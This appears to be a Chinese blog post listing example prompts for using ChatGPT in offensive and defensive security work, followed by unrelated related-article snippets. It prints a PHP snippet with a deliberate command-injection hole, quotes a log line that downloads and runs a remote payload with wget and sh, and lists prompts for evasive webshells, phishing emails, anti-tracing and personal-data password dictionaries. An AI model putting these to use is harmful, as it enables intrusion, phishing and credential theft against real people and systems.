基础入门-ChatGPT结合安全融入技术高效赋能拓展需求

文章目录

  • Chatgpt科普
  • 利用:
    • 安全开发
    • 逆向免杀
    • 代码审计
    • 蓝队应急
    • APT社工学
    • 其他相关:

在这里插入图片描述

Chatgpt科普

  1. ChatGPT是什么?

    ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。

  2. ChatGPT能做什么?
    它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。

  3. ChatGPT牛在哪里?
    (1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。
    (2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。

  4. 安全行业影响:
    (1)整合多种恶意软件
    (2)提升漏洞发现能力
    (3)给新手攻击者赋能
    (4)便于社会工程学攻击
    (5)快速筛选和锁定目标
    (6)模拟网络防御攻击技术

利用:

安全开发

1、如何使用Python写一个jwt爆破脚本?
在这里插入图片描述
2、如何使用Python写一个Webshell检测脚本?
3、如何使用Python写一个MS17010漏洞检测脚本?
4、使用PHP开发一个免杀混淆复杂的webshell脚本
5、在渗透测试靶机中,发现PHP脚本被禁用了敏感函数,如何生成一个绕过的webshell

逆向免杀

1、APK使用什么工具进行反编译?
在这里插入图片描述
2、常见脱壳工具有那些?
3、免杀中使用什么加壳效果好?

代码审计

1、下面代码会出现哪些安全漏洞?又该如何利用呢?

<?phpif( isset( $_POST[ 'Submit' ]  ) ) {// Get input$target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command.if( stristr( php_uname( 's' ), 'Windows NT' ) ) {// Windows$cmd = shell_exec( 'ping  ' . $target );}else {// *nix$cmd = shell_exec( 'ping  -c 4 ' . $target );}// Feedback for the end user$html .= "<pre>{$cmd}</pre>";
}?>

在这里插入图片描述

2、Thinkphp历史漏洞有哪些?
3、shiro反序列化漏洞如何利用?

蓝队应急

0、平台项目:
蓝队针对攻击威胁感知平台项目有哪些?
1、日志分析:
103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”
在这里插入图片描述
2、流量检测:
写一个检测cobaltstrike payload的脚本
写一个Cobalstrike检测rules规则

APT社工学

1、防溯源:Cobaltstike如何防止被溯源
2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知
3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?
在这里插入图片描述

其他相关:

网络安全渗透测试简历模版 早知道前几天投简历就用这个了 emmm
在这里插入图片描述
网络安全渗透测试报告模版

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/15584.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ubuntu系统配置远程登陆、clash、图像化配置

0、IP地址查看 ubuntu查看本机IP地址&#xff0c;先安装net-tools。并且记录你的ip地址xxx.xxx.xxx.xxx sudo apt install net-tools ifconfig 在winr打开输入cmd&#xff0c;如果在同一个局域网应该是可以ping通的 ping xxx.xxx.xxx.xxx 1、ssh连接和sftp连接 ubuntu 安装ssh …

failed to clash core,logs are not available(clash 核心连接失败)

问题描述 之前手欠在联想电脑管家修复了host&#xff0c;导致出现核心连接失败 操作系统 Windows x64 系统版本 windows10 出现问题“Clash 校心连接失败,日志不可用&#xff0c;可能故障-1核心api 端口故障--2.127.0.0.1 不通 -3. 核心并未启动” 后弹出 Windows Termi…

关闭Clash后Chrome或者Edge浏览器无法联网,只有打开clash才可以

在使用Clash的电脑上偶然遇到一个问题&#xff0c;关闭Clash后发现浏览器无法联网&#xff0c;只有打开Clash才可以&#xff0c;在Clash中选择direct模式能正常使用&#xff0c;但是关闭System Proxy或者退出Clash&#xff0c;浏览器都无法连接网络。 尝试将Clash和浏览器都更…

Ubuntu运行./clash -d .时报错

错误信息&#xff1a; 问题原因&#xff1a;没有配置Country.mmdb文件 解决办法&#xff1a; GeoLite2-Country.mmdb.gz dnqbob/sp_engine - Gitee.com &#xff08;1&#xff09;下载文件 &#xff08;2&#xff09;在clash目录下解压 &#xff08;3&#xff09;重命名为…

ikuuu clash无法导入配置文件

本人因为粗心&#xff0c;按照官方教程无法一键导进去配置文件&#xff0c;没有看到ikuuu.yaml文件 解决方法&#xff1a;记得先关闭系统代理&#xff0c;然后再导入配置文件

fildder weixin 记录clash冲突

x5 内核 debug 只debug 指定 debug时可以修改请求数据 时间过长&#xff0c;可以用脚本来修改。 修改请求。 var strBodyoSession.GetRequestBodyAsString(); // 用正则表达式或者replace方法去修改string strBodystrBody.replace("omvg-s1m3ShOkIz1C44OG383WIg&quo…

SHELL CLASH配置规则

本地环境 小米AX1800路由器&#xff0c;旧版&#xff08;黢黑的四方立柱体&#xff0c;没有天线&#xff09;&#xff0c;已降级至固定版本小米 AX1800 1.0.336 问题 因为某些网络原因&#xff0c;在WiFi中安装了shell clash作为互联网代理&#xff0c;使用部分软件时提示网…

人工智能轨道交通行业周刊-第35期(2023.2.20-2.26)

本期关键词&#xff1a;重庆智慧轨道、智能运维主机、标准轨距、地方铁路公报、景深、机器视觉应用 1 整理涉及公众号名单 1.1 行业类 RT轨道交通人民铁道世界轨道交通资讯网铁路信号技术交流北京铁路轨道交通网上榜铁路视点ITS World轨道交通联盟VSTR铁路与城市轨道交通Rai…

计算机毕设——手机天气预报系统

目录 摘要1需求分析2一、开发背景2二、项目需求分析2总体设计2一、系统规划2二、系统功能界面3设置预报城市界面&#xff1a;3天气显示界面&#xff1a;4Widget 桌面小部件界面&#xff1a;5三&#xff0e;设计目标6系统设计6一、开发及运行环境6二、数据库设计6三、主要方法及…

人工智能轨道交通行业周刊-第33期(2023.2.6-2.12)

本期关键词&#xff1a;高铁激光清洗、高铁确认列车、无线通信系统、推理服务优化、量子信息技术 1 整理涉及公众号名单 1.1 行业类 RT轨道交通中关村轨道交通产业服务平台人民铁道世界轨道交通资讯网铁路信号技术交流北京铁路轨道交通网上榜铁路视点ITS World轨道交通联盟V…

逐句回答,流式返回,ChatGPT采用的Server-sent events后端实时推送协议Python3.10实现,基于Tornado6.1

善于观察的朋友一定会敏锐地发现ChatGPT网页端是逐句给出问题答案的&#xff0c;同样&#xff0c;ChatGPT后台Api接口请求中&#xff0c;如果将Stream参数设置为True后&#xff0c;Api接口也可以实现和ChatGPT网页端一样的流式返回&#xff0c;进而更快地给到前端用户反馈&…

使用 Flask 快速构建 基于langchain 和 chatGPT的 PDF摘要总结

简介 这里不对 langchain 和 chatGPT 进行介绍&#xff0c;仅对实现过程进行整理 环境 Python >3.8 Flask2.2.3 Jinja23.1.2 langchain0.0.143 openai0.27.4 实现 总结功能 使用 langchain 和 openai 接口实现总结功能 实现逻辑&#xff1a;通过text_splitter 将pdf 分…

ABAP编程错误-ITAB_DUPLICATE_KEY

問題描述&#xff1a;SO:1100002326訂單修改存檔時&#xff0c;未更新資料&#xff1b;查看ST22發生ITAB_DUPLICATE_KEY的錯誤 處理歩驟&#xff1a; 1.在FQM_FLOW的Table&#xff0c;在ORIGIN_DOCUMENT_ID欄位用訂單號可查出相關的資料&#xff0c;其中DELETED為空白的2筆資料…

SAPSQL_IN_ITAB_ILLEGAL_OPTION dump

Created by Jerry Wang, last modified on Mar 31, 2014 这个runtime error的意思是NM( not empty )被不正确的传入了OPEN SQL的IN keyword里。 我们可以发现domain BAPIOPTION的value range里是不包含NM的。 如果直接在UI上给OBJECT_FAMILY指定NM的search attribute: 点searc…

iTab推荐:ProcessOn-你的创意小帮手

iTab推荐&#xff1a;ProcessOn-你的创意小帮手 如果你是创意工作者&#xff0c;经常需要整理自己的思路&#xff0c;那么一定不要错过这款宝藏软件&#xff0c;它可以帮你大幅提升效率&#xff0c;快速整理自己的idea&#xff1b; 可能你已经听过它了&#xff0c;即ProcessO…

兼顾美观和实用的标签页插件——iTab

兼顾美观和实用的标签页插件——iTab 闲来网上冲浪&#xff0c;被b站一个视频的标题吸引&#xff1a;“【【良心巨制】我一个人肝出来的iTab新标签页&#xff0c;可能是2022年最值得期待的浏览器扩展了-哔哩哔哩】”&#xff08;视频链接&#xff1a;https://b23.tv/2v5hcom&a…

【好物安利】给大家安利一款好用的浏览器插件-iTab

今天给大家安利一款我最近一直在用的浏览器起始页插件-itab。 这款起始页插件&#xff0c;除过可以内置Google&#xff0c;百度等众多搜索引擎外&#xff0c;还聚集了日历、天气、头条新闻、壁纸、倒计时类似iOS小组件和常用网站等等功能&#xff0c;并且这个起始页插件的审美…

【工具】工具推荐-Edge浏览器新标签页插件———iTab

向大家推荐一款我自己用了很长时间的插件——itab 理由一&#xff1a;页面清新简介 点击时间可以切换几件模式 理由二&#xff1a;便捷切换搜索引擎 理由三&#xff1a;无限添加网站图标 更多优点,可以看一下作者本人的视频 【良心巨制】我一个人肝出来的iTab新标签页&#…

iTab新标签页重磅更新 |这些功能绝对有你想要的新体验!

01 写在前面 csdn的朋友们&#xff0c;你好哦&#xff0c;我是iTab 插件的独立开发者&#xff0c;今天给大家安利一下我做的这款桌面插件。 首先要告诉大家一个好消息&#xff1a; 最近iTab新标签页被Edge 浏览器商店官方热门&#x1f525;推荐啦。 在此&#xff0c;特别感谢…